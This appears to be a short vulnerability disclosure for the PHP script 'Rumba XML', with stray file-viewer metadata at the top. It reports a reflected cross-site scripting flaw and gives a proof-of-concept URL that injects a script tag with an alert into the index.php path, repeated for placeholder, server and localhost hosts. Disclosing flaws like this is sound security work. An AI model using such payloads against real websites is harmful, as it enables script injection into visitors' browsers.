26 lines
No EOL
618 B
Text
26 lines
No EOL
618 B
Text
###########################################
|
|
#
|
|
# Script Name : Rumba XML ( All Version )
|
|
#
|
|
# Bug Type : XSS vulnerability
|
|
#
|
|
# Found by : Hadi Kiamarsi
|
|
#
|
|
# Contact : hadikiamarsi [at] hotmail.com
|
|
#
|
|
# Download : http://download.softpedia.ro/dl/4bf8d3951ea08865afb7c98b8c0476fa/4b2a1ca9/600056463/webscripts/PHP/xml18eng.zip
|
|
#
|
|
|
|
###########################################
|
|
|
|
PoC :
|
|
|
|
http://[target]/[path]/index.php/>"><script>alert('Hadi Kiamarsi')</script>
|
|
|
|
example :
|
|
|
|
http://server/index.php/>"><script>alert('Hadi Kiamarsi')</script>
|
|
|
|
local Example :
|
|
|
|
http://localhost/index.php/>"><script>alert('Hadi Kiamarsi')</script> |